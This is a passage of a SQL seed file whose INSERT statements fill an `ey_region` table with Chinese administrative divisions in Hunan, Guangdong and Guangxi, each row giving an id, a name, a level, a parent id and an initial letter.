INSERT INTO `ey_region` VALUES ('26844', '桃源县', '3', '26683', 'T');
INSERT INTO `ey_region` VALUES ('26885', '石门县', '3', '26683', 'S');
INSERT INTO `ey_region` VALUES ('26912', '津市市', '3', '26683', 'J');
INSERT INTO `ey_region` VALUES ('26925', '张家界市', '2', '25579', 'Z');
INSERT INTO `ey_region` VALUES ('26926', '市辖区', '3', '26925', 'S');
INSERT INTO `ey_region` VALUES ('26927', '永定区', '3', '26925', 'Y');
INSERT INTO `ey_region` VALUES ('26959', '武陵源区', '3', '26925', 'W');
INSERT INTO `ey_region` VALUES ('26966', '慈利县', '3', '26925', 'C');
INSERT INTO `ey_region` VALUES ('26998', '桑植县', '3', '26925', 'S');
INSERT INTO `ey_region` VALUES ('27038', '益阳市', '2', '25579', 'Y');
INSERT INTO `ey_region` VALUES ('27039', '市辖区', '3', '27038', 'S');
INSERT INTO `ey_region` VALUES ('27040', '资阳区', '3', '27038', 'Z');
INSERT INTO `ey_region` VALUES ('27049', '赫山区', '3', '27038', 'H');
INSERT INTO `ey_region` VALUES ('27069', '南县', '3', '27038', 'N');
INSERT INTO `ey_region` VALUES ('27087', '桃江县', '3', '27038', 'T');
INSERT INTO `ey_region` VALUES ('27106', '安化县', '3', '27038', 'A');
INSERT INTO `ey_region` VALUES ('27130', '沅江市', '3', '27038', 'Y');
INSERT INTO `ey_region` VALUES ('27147', '郴州市', '2', '25579', 'C');
INSERT INTO `ey_region` VALUES ('27148', '市辖区', '3', '27147', 'S');
INSERT INTO `ey_region` VALUES ('27149', '北湖区', '3', '27147', 'B');
INSERT INTO `ey_region` VALUES ('27168', '苏仙区', '3', '27147', 'S');
INSERT INTO `ey_region` VALUES ('27188', '桂阳县', '3', '27147', 'G');
INSERT INTO `ey_region` VALUES ('27228', '宜章县', '3', '27147', 'Y');
INSERT INTO `ey_region` VALUES ('27256', '永兴县', '3', '27147', 'Y');
INSERT INTO `ey_region` VALUES ('27282', '嘉禾县', '3', '27147', 'J');
INSERT INTO `ey_region` VALUES ('27300', '临武县', '3', '27147', 'L');
INSERT INTO `ey_region` VALUES ('27323', '汝城县', '3', '27147', 'R');
INSERT INTO `ey_region` VALUES ('27347', '桂东县', '3', '27147', 'G');
INSERT INTO `ey_region` VALUES ('27367', '安仁县', '3', '27147', 'A');
INSERT INTO `ey_region` VALUES ('27389', '资兴市', '3', '27147', 'Z');
INSERT INTO `ey_region` VALUES ('27418', '永州市', '2', '25579', 'Y');
INSERT INTO `ey_region` VALUES ('27419', '市辖区', '3', '27418', 'S');
INSERT INTO `ey_region` VALUES ('27420', '零陵区', '3', '27418', 'L');
INSERT INTO `ey_region` VALUES ('27437', '冷水滩区', '3', '27418', 'L');
INSERT INTO `ey_region` VALUES ('27459', '祁阳县', '3', '27418', 'Q');
INSERT INTO `ey_region` VALUES ('27492', '东安县', '3', '27418', 'D');
INSERT INTO `ey_region` VALUES ('27511', '双牌县', '3', '27418', 'S');
INSERT INTO `ey_region` VALUES ('27527', '道县', '3', '27418', 'D');
INSERT INTO `ey_region` VALUES ('27554', '江永县', '3', '27418', 'J');
INSERT INTO `ey_region` VALUES ('27567', '宁远县', '3', '27418', 'N');
INSERT INTO `ey_region` VALUES ('27585', '蓝山县', '3', '27418', 'L');
INSERT INTO `ey_region` VALUES ('27606', '新田县', '3', '27418', 'X');
INSERT INTO `ey_region` VALUES ('27626', '江华县', '3', '27418', 'J');
INSERT INTO `ey_region` VALUES ('27650', '怀化市', '2', '25579', 'H');
INSERT INTO `ey_region` VALUES ('27651', '市辖区', '3', '27650', 'S');
INSERT INTO `ey_region` VALUES ('27652', '鹤城区', '3', '27650', 'H');
INSERT INTO `ey_region` VALUES ('27667', '中方县', '3', '27650', 'Z');
INSERT INTO `ey_region` VALUES ('27690', '沅陵县', '3', '27650', 'Y');
INSERT INTO `ey_region` VALUES ('27714', '辰溪县', '3', '27650', 'C');
INSERT INTO `ey_region` VALUES ('27745', '溆浦县', '3', '27650', 'X');
INSERT INTO `ey_region` VALUES ('27789', '会同县', '3', '27650', 'H');
INSERT INTO `ey_region` VALUES ('27815', '麻阳县', '3', '27650', 'M');
INSERT INTO `ey_region` VALUES ('27839', '新晃县', '3', '27650', 'X');
INSERT INTO `ey_region` VALUES ('27863', '芷江县', '3', '27650', 'Z');
INSERT INTO `ey_region` VALUES ('27892', '靖州苗族侗族县', '3', '27650', 'J');
INSERT INTO `ey_region` VALUES ('27906', '通道县', '3', '27650', 'T');
INSERT INTO `ey_region` VALUES ('27930', '洪江市', '3', '27650', 'H');
INSERT INTO `ey_region` VALUES ('27963', '娄底市', '2', '25579', 'L');
INSERT INTO `ey_region` VALUES ('27964', '市辖区', '3', '27963', 'S');
INSERT INTO `ey_region` VALUES ('27965', '娄星区', '3', '27963', 'L');
INSERT INTO `ey_region` VALUES ('27980', '双峰县', '3', '27963', 'S');
INSERT INTO `ey_region` VALUES ('27997', '新化县', '3', '27963', 'X');
INSERT INTO `ey_region` VALUES ('28027', '冷水江市', '3', '27963', 'L');
INSERT INTO `ey_region` VALUES ('28044', '涟源市', '3', '27963', 'L');
INSERT INTO `ey_region` VALUES ('28065', '湘西州', '2', '25579', 'X');
INSERT INTO `ey_region` VALUES ('28066', '吉首市', '3', '28065', 'J');
INSERT INTO `ey_region` VALUES ('28082', '泸溪县', '3', '28065', 'L');
INSERT INTO `ey_region` VALUES ('28099', '凤凰县', '3', '28065', 'F');
INSERT INTO `ey_region` VALUES ('28124', '花垣县', '3', '28065', 'H');
INSERT INTO `ey_region` VALUES ('28143', '保靖县', '3', '28065', 'B');
INSERT INTO `ey_region` VALUES ('28161', '古丈县', '3', '28065', 'G');
INSERT INTO `ey_region` VALUES ('28174', '永顺县', '3', '28065', 'Y');
INSERT INTO `ey_region` VALUES ('28205', '龙山县', '3', '28065', 'L');
INSERT INTO `ey_region` VALUES ('28240', '广东省', '1', '0', 'G');
INSERT INTO `ey_region` VALUES ('28241', '广州市', '2', '28240', 'G');
INSERT INTO `ey_region` VALUES ('28242', '市辖区', '3', '28241', 'S');
INSERT INTO `ey_region` VALUES ('28243', '荔湾区', '3', '28241', 'L');
INSERT INTO `ey_region` VALUES ('28266', '越秀区', '3', '28241', 'Y');
INSERT INTO `ey_region` VALUES ('28289', '海珠区', '3', '28241', 'H');
INSERT INTO `ey_region` VALUES ('28308', '天河区', '3', '28241', 'T');
INSERT INTO `ey_region` VALUES ('28330', '白云区', '3', '28241', 'B');
INSERT INTO `ey_region` VALUES ('28349', '黄埔区', '3', '28241', 'H');
INSERT INTO `ey_region` VALUES ('28359', '番禺区', '3', '28241', 'F');
INSERT INTO `ey_region` VALUES ('28377', '花都区', '3', '28241', 'H');
INSERT INTO `ey_region` VALUES ('28386', '南沙区', '3', '28241', 'N');
INSERT INTO `ey_region` VALUES ('28392', '萝岗区', '3', '28241', 'L');
INSERT INTO `ey_region` VALUES ('28399', '增城市', '3', '28241', 'Z');
INSERT INTO `ey_region` VALUES ('28409', '从化市', '3', '28241', 'C');
INSERT INTO `ey_region` VALUES ('28421', '韶关市', '2', '28240', 'S');
INSERT INTO `ey_region` VALUES ('28422', '市辖区', '3', '28421', 'S');
INSERT INTO `ey_region` VALUES ('28423', '武江区', '3', '28421', 'W');
INSERT INTO `ey_region` VALUES ('28431', '浈江区', '3', '28421', 'Z');
INSERT INTO `ey_region` VALUES ('28448', '曲江区', '3', '28421', 'Q');
INSERT INTO `ey_region` VALUES ('28463', '始兴县', '3', '28421', 'S');
INSERT INTO `ey_region` VALUES ('28475', '仁化县', '3', '28421', 'R');
INSERT INTO `ey_region` VALUES ('28488', '翁源县', '3', '28421', 'W');
INSERT INTO `ey_region` VALUES ('28497', '乳源县', '3', '28421', 'R');
INSERT INTO `ey_region` VALUES ('28509', '新丰县', '3', '28421', 'X');
INSERT INTO `ey_region` VALUES ('28517', '乐昌市', '3', '28421', 'L');
INSERT INTO `ey_region` VALUES ('28539', '南雄市', '3', '28421', 'N');
INSERT INTO `ey_region` VALUES ('28558', '深圳市', '2', '28240', 'S');
INSERT INTO `ey_region` VALUES ('28559', '市辖区', '3', '28558', 'S');
INSERT INTO `ey_region` VALUES ('28560', '罗湖区', '3', '28558', 'L');
INSERT INTO `ey_region` VALUES ('28571', '福田区', '3', '28558', 'F');
INSERT INTO `ey_region` VALUES ('28581', '南山区', '3', '28558', 'N');
INSERT INTO `ey_region` VALUES ('28590', '宝安区', '3', '28558', 'B');
INSERT INTO `ey_region` VALUES ('28604', '龙岗区', '3', '28558', 'L');
INSERT INTO `ey_region` VALUES ('28619', '盐田区', '3', '28558', 'Y');
INSERT INTO `ey_region` VALUES ('28626', '珠海市', '2', '28240', 'Z');
INSERT INTO `ey_region` VALUES ('28627', '市辖区', '3', '28626', 'S');
INSERT INTO `ey_region` VALUES ('28628', '香洲区', '3', '28626', 'X');
INSERT INTO `ey_region` VALUES ('28646', '斗门区', '3', '28626', 'D');
INSERT INTO `ey_region` VALUES ('28654', '金湾区', '3', '28626', 'J');
INSERT INTO `ey_region` VALUES ('28659', '汕头市', '2', '28240', 'S');
INSERT INTO `ey_region` VALUES ('28660', '市辖区', '3', '28659', 'S');
INSERT INTO `ey_region` VALUES ('28661', '龙湖区', '3', '28659', 'L');
INSERT INTO `ey_region` VALUES ('28669', '金平区', '3', '28659', 'J');
INSERT INTO `ey_region` VALUES ('28687', '濠江区', '3', '28659', 'H');
INSERT INTO `ey_region` VALUES ('28695', '潮阳区', '3', '28659', 'C');
INSERT INTO `ey_region` VALUES ('28709', '潮南区', '3', '28659', 'C');
INSERT INTO `ey_region` VALUES ('28721', '澄海区', '3', '28659', 'C');
INSERT INTO `ey_region` VALUES ('28733', '南澳县', '3', '28659', 'N');
INSERT INTO `ey_region` VALUES ('28737', '佛山市', '2', '28240', 'F');
INSERT INTO `ey_region` VALUES ('28738', '市辖区', '3', '28737', 'S');
INSERT INTO `ey_region` VALUES ('28739', '禅城区', '3', '28737', 'C');
INSERT INTO `ey_region` VALUES ('28744', '南海区', '3', '28737', 'N');
INSERT INTO `ey_region` VALUES ('28753', '顺德区', '3', '28737', 'S');
INSERT INTO `ey_region` VALUES ('28764', '三水区', '3', '28737', 'S');
INSERT INTO `ey_region` VALUES ('28776', '高明区', '3', '28737', 'G');
INSERT INTO `ey_region` VALUES ('28785', '江门市', '2', '28240', 'J');
INSERT INTO `ey_region` VALUES ('28786', '市辖区', '3', '28785', 'S');
INSERT INTO `ey_region` VALUES ('28787', '蓬江区', '3', '28785', 'P');
INSERT INTO `ey_region` VALUES ('28797', '江海区', '3', '28785', 'J');
INSERT INTO `ey_region` VALUES ('28803', '新会区', '3', '28785', 'X');
INSERT INTO `ey_region` VALUES ('28818', '台山市', '3', '28785', 'T');
INSERT INTO `ey_region` VALUES ('28837', '开平市', '3', '28785', 'K');
INSERT INTO `ey_region` VALUES ('28853', '鹤山市', '3', '28785', 'H');
INSERT INTO `ey_region` VALUES ('28867', '恩平市', '3', '28785', 'E');
INSERT INTO `ey_region` VALUES ('28880', '湛江市', '2', '28240', 'Z');
INSERT INTO `ey_region` VALUES ('28881', '市辖区', '3', '28880', 'S');
INSERT INTO `ey_region` VALUES ('28882', '湛江市赤坎区', '3', '28880', 'Z');
INSERT INTO `ey_region` VALUES ('28891', '湛江市霞山区', '3', '28880', 'Z');
INSERT INTO `ey_region` VALUES ('28904', '湛江市坡头区', '3', '28880', 'Z');
INSERT INTO `ey_region` VALUES ('28914', '湛江市麻章区', '3', '28880', 'Z');
INSERT INTO `ey_region` VALUES ('28923', '遂溪县', '3', '28880', 'S');
INSERT INTO `ey_region` VALUES ('28941', '徐闻县', '3', '28880', 'X');
INSERT INTO `ey_region` VALUES ('28962', '廉江市', '3', '28880', 'L');
INSERT INTO `ey_region` VALUES ('28984', '雷州市', '3', '28880', 'L');
INSERT INTO `ey_region` VALUES ('29010', '吴川市', '3', '28880', 'W');
INSERT INTO `ey_region` VALUES ('29026', '茂名市', '2', '28240', 'M');
INSERT INTO `ey_region` VALUES ('29027', '市辖区', '3', '29026', 'S');
INSERT INTO `ey_region` VALUES ('29028', '茂南区', '3', '29026', 'M');
INSERT INTO `ey_region` VALUES ('29045', '茂港区', '3', '29026', 'M');
INSERT INTO `ey_region` VALUES ('29053', '电白县', '3', '29026', 'D');
INSERT INTO `ey_region` VALUES ('29075', '高州市', '3', '29026', 'G');
INSERT INTO `ey_region` VALUES ('29107', '化州市', '3', '29026', 'H');
INSERT INTO `ey_region` VALUES ('29138', '信宜市', '3', '29026', 'X');
INSERT INTO `ey_region` VALUES ('29159', '肇庆市', '2', '28240', 'Z');
INSERT INTO `ey_region` VALUES ('29160', '市辖区', '3', '29159', 'S');
INSERT INTO `ey_region` VALUES ('29161', '端州区', '3', '29159', 'D');
INSERT INTO `ey_region` VALUES ('29169', '鼎湖区', '3', '29159', 'D');
INSERT INTO `ey_region` VALUES ('29178', '广宁县', '3', '29159', 'G');
INSERT INTO `ey_region` VALUES ('29196', '怀集县', '3', '29159', 'H');
INSERT INTO `ey_region` VALUES ('29217', '封开县', '3', '29159', 'F');
INSERT INTO `ey_region` VALUES ('29234', '德庆县', '3', '29159', 'D');
INSERT INTO `ey_region` VALUES ('29248', '高要市', '3', '29159', 'G');
INSERT INTO `ey_region` VALUES ('29266', '四会市', '3', '29159', 'S');
INSERT INTO `ey_region` VALUES ('29282', '惠州市', '2', '28240', 'H');
INSERT INTO `ey_region` VALUES ('29283', '市辖区', '3', '29282', 'S');
INSERT INTO `ey_region` VALUES ('29284', '惠城区', '3', '29282', 'H');
INSERT INTO `ey_region` VALUES ('29304', '惠阳区', '3', '29282', 'H');
INSERT INTO `ey_region` VALUES ('29317', '博罗县', '3', '29282', 'B');
INSERT INTO `ey_region` VALUES ('29335', '惠东县', '3', '29282', 'H');
INSERT INTO `ey_region` VALUES ('29355', '龙门县', '3', '29282', 'L');
INSERT INTO `ey_region` VALUES ('29371', '梅州市', '2', '28240', 'M');
INSERT INTO `ey_region` VALUES ('29372', '市辖区', '3', '29371', 'S');
INSERT INTO `ey_region` VALUES ('29373', '梅江区', '3', '29371', 'M');
INSERT INTO `ey_region` VALUES ('29380', '梅县', '3', '29371', 'M');
INSERT INTO `ey_region` VALUES ('29400', '大埔县', '3', '29371', 'D');
INSERT INTO `ey_region` VALUES ('29418', '丰顺县', '3', '29371', 'F');
INSERT INTO `ey_region` VALUES ('29436', '五华县', '3', '29371', 'W');
INSERT INTO `ey_region` VALUES ('29453', '平远县', '3', '29371', 'P');
INSERT INTO `ey_region` VALUES ('29466', '蕉岭县', '3', '29371', 'J');
INSERT INTO `ey_region` VALUES ('29477', '兴宁市', '3', '29371', 'X');
INSERT INTO `ey_region` VALUES ('29498', '汕尾市', '2', '28240', 'S');
INSERT INTO `ey_region` VALUES ('29499', '市辖区', '3', '29498', 'S');
INSERT INTO `ey_region` VALUES ('29500', '城区', '3', '29498', 'C');
INSERT INTO `ey_region` VALUES ('29511', '海丰县', '3', '29498', 'H');
INSERT INTO `ey_region` VALUES ('29529', '陆河县', '3', '29498', 'L');
INSERT INTO `ey_region` VALUES ('29538', '陆丰市', '3', '29498', 'L');
INSERT INTO `ey_region` VALUES ('29568', '河源市', '2', '28240', 'H');
INSERT INTO `ey_region` VALUES ('29569', '市辖区', '3', '29568', 'S');
INSERT INTO `ey_region` VALUES ('29570', '源城区', '3', '29568', 'Y');
INSERT INTO `ey_region` VALUES ('29578', '紫金县', '3', '29568', 'Z');
INSERT INTO `ey_region` VALUES ('29599', '龙川县', '3', '29568', 'L');
INSERT INTO `ey_region` VALUES ('29625', '连平县', '3', '29568', 'L');
INSERT INTO `ey_region` VALUES ('29639', '和平县', '3', '29568', 'H');
INSERT INTO `ey_region` VALUES ('29657', '东源县', '3', '29568', 'D');
INSERT INTO `ey_region` VALUES ('29679', '阳江市', '2', '28240', 'Y');
INSERT INTO `ey_region` VALUES ('29680', '市辖区', '3', '29679', 'S');
INSERT INTO `ey_region` VALUES ('29681', '江城区', '3', '29679', 'J');
INSERT INTO `ey_region` VALUES ('29698', '阳西县', '3', '29679', 'Y');
INSERT INTO `ey_region` VALUES ('29709', '阳东县', '3', '29679', 'Y');
INSERT INTO `ey_region` VALUES ('29729', '阳春市', '3', '29679', 'Y');
INSERT INTO `ey_region` VALUES ('29755', '清远市', '2', '28240', 'Q');
INSERT INTO `ey_region` VALUES ('29756', '市辖区', '3', '29755', 'S');
INSERT INTO `ey_region` VALUES ('29757', '清城区', '3', '29755', 'Q');
INSERT INTO `ey_region` VALUES ('29766', '佛冈县', '3', '29755', 'F');
INSERT INTO `ey_region` VALUES ('29773', '阳山县', '3', '29755', 'Y');
INSERT INTO `ey_region` VALUES ('29787', '连山县', '3', '29755', 'L');
INSERT INTO `ey_region` VALUES ('29797', '连南县', '3', '29755', 'L');
INSERT INTO `ey_region` VALUES ('29805', '清新县', '3', '29755', 'Q');
INSERT INTO `ey_region` VALUES ('29816', '英德市', '3', '29755', 'Y');
INSERT INTO `ey_region` VALUES ('29842', '连州市', '3', '29755', 'L');
INSERT INTO `ey_region` VALUES ('29855', '东莞市', '2', '28240', 'D');
INSERT INTO `ey_region` VALUES ('29890', '中山市', '2', '28240', 'Z');
INSERT INTO `ey_region` VALUES ('29915', '潮州市', '2', '28240', 'C');
INSERT INTO `ey_region` VALUES ('29916', '市辖区', '3', '29915', 'S');
INSERT INTO `ey_region` VALUES ('29917', '潮州市湘桥区', '3', '29915', 'C');
INSERT INTO `ey_region` VALUES ('29930', '潮州市潮安县', '3', '29915', 'C');
INSERT INTO `ey_region` VALUES ('29954', '潮州市饶平县', '3', '29915', 'C');
INSERT INTO `ey_region` VALUES ('29977', '揭阳市', '2', '28240', 'J');
INSERT INTO `ey_region` VALUES ('29978', '市辖区', '3', '29977', 'S');
INSERT INTO `ey_region` VALUES ('29979', '榕城区', '3', '29977', 'R');
INSERT INTO `ey_region` VALUES ('29990', '揭东县', '3', '29977', 'J');
INSERT INTO `ey_region` VALUES ('30008', '揭西县', '3', '29977', 'J');
INSERT INTO `ey_region` VALUES ('30032', '惠来县', '3', '29977', 'H');
INSERT INTO `ey_region` VALUES ('30054', '普宁市', '3', '29977', 'P');
INSERT INTO `ey_region` VALUES ('30086', '云浮市', '2', '28240', 'Y');
INSERT INTO `ey_region` VALUES ('30087', '市辖区', '3', '30086', 'S');
INSERT INTO `ey_region` VALUES ('30088', '云城区', '3', '30086', 'Y');
INSERT INTO `ey_region` VALUES ('30096', '新兴县', '3', '30086', 'X');
INSERT INTO `ey_region` VALUES ('30112', '郁南县', '3', '30086', 'Y');
INSERT INTO `ey_region` VALUES ('30132', '云安县', '3', '30086', 'Y');
INSERT INTO `ey_region` VALUES ('30141', '罗定市', '3', '30086', 'L');
INSERT INTO `ey_region` VALUES ('30164', '广西壮族自治区', '1', '0', 'G');
INSERT INTO `ey_region` VALUES ('30165', '南宁市', '2', '30164', 'N');
INSERT INTO `ey_region` VALUES ('30166', '市辖区', '3', '30165', 'S');
INSERT INTO `ey_region` VALUES ('30167', '兴宁区', '3', '30165', 'X');
INSERT INTO `ey_region` VALUES ('30174', '青秀区', '3', '30165', 'Q');
INSERT INTO `ey_region` VALUES ('30186', '江南区', '3', '30165', 'J');
INSERT INTO `ey_region` VALUES ('30196', '西乡塘区', '3', '30165', 'X');
INSERT INTO `ey_region` VALUES ('30214', '良庆区', '3', '30165', 'L');
INSERT INTO `ey_region` VALUES ('30222', '邕宁区', '3', '30165', 'Y');
INSERT INTO `ey_region` VALUES ('30228', '武鸣县', '3', '30165', 'W');
INSERT INTO `ey_region` VALUES ('30245', '隆安县', '3', '30165', 'L');
INSERT INTO `ey_region` VALUES ('30257', '马山县', '3', '30165', 'M');
INSERT INTO `ey_region` VALUES ('30270', '上林县', '3', '30165', 'S');
INSERT INTO `ey_region` VALUES ('30282', '宾阳县', '3', '30165', 'B');
INSERT INTO `ey_region` VALUES ('30300', '横县', '3', '30165', 'H');
INSERT INTO `ey_region` VALUES ('30319', '柳州市', '2', '30164', 'L');
INSERT INTO `ey_region` VALUES ('30320', '市辖区', '3', '30319', 'S');
INSERT INTO `ey_region` VALUES ('30321', '城中区', '3', '30319', 'C');
INSERT INTO `ey_region` VALUES ('30329', '鱼峰区', '3', '30319', 'Y');
INSERT INTO `ey_region` VALUES ('30338', '柳南区', '3', '30319', 'L');
INSERT INTO `ey_region` VALUES ('30348', '柳北区', '3', '30319', 'L');
INSERT INTO `ey_region` VALUES ('30361', '柳江县', '3', '30319', 'L');
INSERT INTO `ey_region` VALUES ('30374', '柳城县', '3', '30319', 'L');
INSERT INTO `ey_region` VALUES ('30387', '鹿寨县', '3', '30319', 'L');
INSERT INTO `ey_region` VALUES ('30398', '融安县', '3', '30319', 'R');
INSERT INTO `ey_region` VALUES ('30411', '融水县', '3', '30319', 'R');
INSERT INTO `ey_region` VALUES ('30432', '三江县', '3', '30319', 'S');
INSERT INTO `ey_region` VALUES ('30448', '桂林市', '2', '30164', 'G');
INSERT INTO `ey_region` VALUES ('30449', '市辖区', '3', '30448', 'S');
INSERT INTO `ey_region` VALUES ('30450', '秀峰区', '3', '30448', 'X');
INSERT INTO `ey_region` VALUES ('30454', '叠彩区', '3', '30448', 'D');
INSERT INTO `ey_region` VALUES ('30458', '象山区', '3', '30448', 'X');
INSERT INTO `ey_region` VALUES ('30463', '七星区', '3', '30448', 'Q');
INSERT INTO `ey_region` VALUES ('30469', '雁山区', '3', '30448', 'Y');
INSERT INTO `ey_region` VALUES ('30475', '阳朔县', '3', '30448', 'Y');
INSERT INTO `ey_region` VALUES ('30485', '临桂县', '3', '30448', 'L');
INSERT INTO `ey_region` VALUES ('30497', '灵川县', '3', '30448', 'L');
INSERT INTO `ey_region` VALUES ('30509', '全州县', '3', '30448', 'Q');
INSERT INTO `ey_region` VALUES ('30528', '兴安县', '3', '30448', 'X');
INSERT INTO `ey_region` VALUES ('30539', '永福县', '3', '30448', 'Y');
INSERT INTO `ey_region` VALUES ('30549', '灌阳县', '3', '30448', 'G');
INSERT INTO `ey_region` VALUES ('30559', '龙胜县', '3', '30448', 'L');
INSERT INTO `ey_region` VALUES ('30570', '资源县', '3', '30448', 'Z');
INSERT INTO `ey_region` VALUES ('30578', '平乐县', '3', '30448', 'P');
INSERT INTO `ey_region` VALUES ('30589', '荔浦县', '3', '30448', 'L');
INSERT INTO `ey_region` VALUES ('30603', '恭城县', '3', '30448', 'G');
INSERT INTO `ey_region` VALUES ('30613', '梧州市', '2', '30164', 'W');
INSERT INTO `ey_region` VALUES ('30614', '市辖区', '3', '30613', 'S');
INSERT INTO `ey_region` VALUES ('30615', '万秀区', '3', '30613', 'W');
INSERT INTO `ey_region` VALUES ('30622', '蝶山区', '3', '30613', 'D');
INSERT INTO `ey_region` VALUES ('30628', '长洲区', '3', '30613', 'C');
INSERT INTO `ey_region` VALUES ('30633', '苍梧县', '3', '30613', 'C');
INSERT INTO `ey_region` VALUES ('30646', '藤县', '3', '30613', 'T');
INSERT INTO `ey_region` VALUES ('30663', '蒙山县', '3', '30613', 'M');
INSERT INTO `ey_region` VALUES ('30673', '岑溪市', '3', '30613', 'C');
INSERT INTO `ey_region` VALUES ('30688', '北海市', '2', '30164', 'B');
INSERT INTO `ey_region` VALUES ('30689', '市辖区', '3', '30688', 'S');
INSERT INTO `ey_region` VALUES ('30690', '海城区', '3', '30688', 'H');
INSERT INTO `ey_region` VALUES ('30699', '银海区', '3', '30688', 'Y');
INSERT INTO `ey_region` VALUES ('30704', '铁山港区', '3', '30688', 'T');
INSERT INTO `ey_region` VALUES ('30708', '合浦县', '3', '30688', 'H');
INSERT INTO `ey_region` VALUES ('30724', '防城港市', '2', '30164', 'F');
INSERT INTO `ey_region` VALUES ('30725', '市辖区', '3', '30724', 'S');
INSERT INTO `ey_region` VALUES ('30726', '港口区', '3', '30724', 'G');
INSERT INTO `ey_region` VALUES ('30732', '防城区', '3', '30724', 'F');
INSERT INTO `ey_region` VALUES ('30748', '上思县', '3', '30724', 'S');
INSERT INTO `ey_region` VALUES ('30758', '东兴市', '3', '30724', 'D');
INSERT INTO `ey_region` VALUES ('30762', '钦州市', '2', '30164', 'Q');
INSERT INTO `ey_region` VALUES ('30763', '市辖区', '3', '30762', 'S');
INSERT INTO `ey_region` VALUES ('30764', '钦南区', '3', '30762', 'Q');
INSERT INTO `ey_region` VALUES ('30783', '钦北区', '3', '30762', 'Q');
INSERT INTO `ey_region` VALUES ('30796', '灵山县', '3', '30762', 'L');
INSERT INTO `ey_region` VALUES ('30817', '浦北县', '3', '30762', 'P');
INSERT INTO `ey_region` VALUES ('30834', '贵港市', '2', '30164', 'G');
INSERT INTO `ey_region` VALUES ('30835', '市辖区', '3', '30834', 'S');
INSERT INTO `ey_region` VALUES ('30836', '港北区', '3', '30834', 'G');
INSERT INTO `ey_region` VALUES ('30845', '港南区', '3', '30834', 'G');
INSERT INTO `ey_region` VALUES ('30855', '覃塘区', '3', '30834', 'Q');
INSERT INTO `ey_region` VALUES ('30866', '平南县', '3', '30834', 'P');
INSERT INTO `ey_region` VALUES ('30888', '桂平市', '3', '30834', 'G');
INSERT INTO `ey_region` VALUES ('30915', '玉林市', '2', '30164', 'Y');
INSERT INTO `ey_region` VALUES ('30916', '市辖区', '3', '30915', 'S');
INSERT INTO `ey_region` VALUES ('30917', '玉州区', '3', '30915', 'Y');
INSERT INTO `ey_region` VALUES ('30933', '容县', '3', '30915', 'R');
INSERT INTO `ey_region` VALUES ('30949', '陆川县', '3', '30915', 'L');
INSERT INTO `ey_region` VALUES ('30964', '博白县', '3', '30915', 'B');
INSERT INTO `ey_region` VALUES ('30993', '兴业县', '3', '30915', 'X');
INSERT INTO `ey_region` VALUES ('31007', '北流市', '3', '30915', 'B');
INSERT INTO `ey_region` VALUES ('31033', '百色市', '2', '30164', 'B');
INSERT INTO `ey_region` VALUES ('31034', '市辖区', '3', '31033', 'S');
INSERT INTO `ey_region` VALUES ('31035', '右江区', '3', '31033', 'Y');
INSERT INTO `ey_region` VALUES ('31045', '田阳县', '3', '31033', 'T');
INSERT INTO `ey_region` VALUES ('31056', '田东县', '3', '31033', 'T');
INSERT INTO `ey_region` VALUES ('31067', '平果县', '3', '31033', 'P');
INSERT INTO `ey_region` VALUES ('31081', '德保县', '3', '31033', 'D');
INSERT INTO `ey_region` VALUES ('31095', '靖西县', '3', '31033', 'J');
INSERT INTO `ey_region` VALUES ('31115', '那坡县', '3', '31033', 'N');
INSERT INTO `ey_region` VALUES ('31125', '凌云县', '3', '31033', 'L');
INSERT INTO `ey_region` VALUES ('31134', '乐业县', '3', '31033', 'L');
INSERT INTO `ey_region` VALUES ('31143', '田林县', '3', '31033', 'T');
INSERT INTO `ey_region` VALUES ('31158', '西林县', '3', '31033', 'X');
INSERT INTO `ey_region` VALUES ('31167', '隆林县', '3', '31033', 'L');
INSERT INTO `ey_region` VALUES ('31184', '贺州市', '2', '30164', 'H');
INSERT INTO `ey_region` VALUES ('31185', '市辖区', '3', '31184', 'S');
INSERT INTO `ey_region` VALUES ('31186', '八步区', '3', '31184', 'B');
INSERT INTO `ey_region` VALUES ('31208', '昭平县', '3', '31184', 'Z');
INSERT INTO `ey_region` VALUES ('31221', '钟山县', '3', '31184', 'Z');
INSERT INTO `ey_region` VALUES ('31236', '富川县', '3', '31184', 'F');
INSERT INTO `ey_region` VALUES ('31249', '河池市', '2', '30164', 'H');
INSERT INTO `ey_region` VALUES ('31250', '市辖区', '3', '31249', 'S');
INSERT INTO `ey_region` VALUES ('31251', '金城江区', '3', '31249', 'J');
INSERT INTO `ey_region` VALUES ('31264', '南丹县', '3', '31249', 'N');
INSERT INTO `ey_region` VALUES ('31276', '天峨县', '3', '31249', 'T');
INSERT INTO `ey_region` VALUES ('31286', '凤山县', '3', '31249', 'F');
INSERT INTO `ey_region` VALUES ('31296', '东兰县', '3', '31249', 'D');
INSERT INTO `ey_region` VALUES ('31311', '罗城县', '3', '31249', 'L');
INSERT INTO `ey_region` VALUES ('31323', '环江县', '3', '31249', 'H');
INSERT INTO `ey_region` VALUES ('31336', '巴马县', '3', '31249', 'B');
INSERT INTO `ey_region` VALUES ('31347', '都安县', '3', '31249', 'D');
INSERT INTO `ey_region` VALUES ('31367', '大化县', '3', '31249', 'D');
INSERT INTO `ey_region` VALUES ('31384', '宜州市', '3', '31249', 'Y');
INSERT INTO `ey_region` VALUES ('31401', '来宾市', '2', '30164', 'L');
INSERT INTO `ey_region` VALUES ('31402', '市辖区', '3', '31401', 'S');
INSERT INTO `ey_region` VALUES ('31403', '兴宾区', '3', '31401', 'X');
INSERT INTO `ey_region` VALUES ('31427', '忻城县', '3', '31401', 'X');
INSERT INTO `ey_region` VALUES ('31440', '象州县', '3', '31401', 'X');
INSERT INTO `ey_region` VALUES ('31452', '武宣县', '3', '31401', 'W');
INSERT INTO `ey_region` VALUES ('31463', '金秀县', '3', '31401', 'J');
INSERT INTO `ey_region` VALUES ('31474', '合山市', '3', '31401', 'H');
INSERT INTO `ey_region` VALUES ('31478', '崇左市', '2', '30164', 'C');
INSERT INTO `ey_region` VALUES ('31479', '市辖区', '3', '31478', 'S');
INSERT INTO `ey_region` VALUES ('31480', '江州区', '3', '31478', 'J');
INSERT INTO `ey_region` VALUES ('31490', '扶绥县', '3', '31478', 'F');
INSERT INTO `ey_region` VALUES ('31502', '宁明县', '3', '31478', 'N');
INSERT INTO `ey_region` VALUES ('31516', '龙州县', '3', '31478', 'L');
INSERT INTO `ey_region` VALUES ('31529', '大新县', '3', '31478', 'D');
INSERT INTO `ey_region` VALUES ('31544', '天等县', '3', '31478', 'T');
INSERT INTO `ey_region` VALUES ('31558', '凭祥市', '3', '31478', 'P');
